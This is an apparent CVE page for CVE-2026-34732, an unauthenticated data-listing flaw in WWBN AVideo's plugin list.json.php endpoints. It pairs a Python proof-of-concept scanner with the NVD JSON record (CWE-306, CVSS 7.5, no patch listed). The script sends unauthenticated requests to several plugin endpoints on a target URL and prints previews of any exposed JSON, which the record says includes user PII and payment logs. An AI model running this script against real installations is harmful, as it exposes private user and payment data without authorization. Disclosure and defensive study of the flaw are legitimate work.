CVE-2026-34732

import requests import sys # PoC for CVE-2026-34732: WWBN AVideo Unauthenticated Data Listing # This script checks for exposed list.json.php endpoints in plugins. def check_vulnerability(target_url): # Common vulnerable endpoint patterns based on the CreatePlugin template # The exact list of 21 endpoints varies by installation, here are examples endpoints = [ "/plugin/AVideoPluginExample/list.json.php", "/plugin/Marketplace/list.json.php", "/plugin/Meet/list.json.php", "/plugin/Social/login.json.php", # Hypothetical path based on structure "/plugin/Streamer/list.json.php" ] print(f"[*] Scanning target: {target_url}") for endpoint in endpoints: full_url = target_url.rstrip('/') + endpoint try: # Send unauthenticated GET request response = requests.get(full_url, timeout=5) if response.status_code == 200: try: data = response.json() print(f"[+] Potential sensitive data leak found at: {full_url}") print(f"[+] Response preview: {str(data)[:200]}...") except ValueError: # Not JSON, might be HTML error or redirect pass except requests.RequestException as e: print(f"[-] Error connecting to {full_url}: {e}") if __name__ == "__main__": if len(sys.argv) != 2: print("Usage: python3 cve_2026_34732_poc.py <http://target_url>") print("Example: python3 cve_2026_34732_poc.py http://localhost/avideo") else: check_vulnerability(sys.argv[1])

{"cve": {"id": "CVE-2026-34732", "sourceIdentifier": "[email protected]", "published": "2026-03-31T21:16:31.910", "lastModified": "2026-04-01T18:38:07.460", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions 26.0 and prior, the AVideo CreatePlugin template for list.json.php does not include any authentication or authorization check. While the companion templates add.json.php and delete.json.php both require admin privileges, the list.json.php template was shipped without this guard. Every plugin that uses the CreatePlugin code generator inherits this omission, resulting in 21 unauthenticated data listing endpoints across the platform. These endpoints expose sensitive data including user PII, payment transaction logs, IP addresses, user agents, and internal system records. At time of publication, there are no publicly available patches."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndIncluding": "26.0", "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-g2mg-cgr6-vmv7", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-g2mg-cgr6-vmv7", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}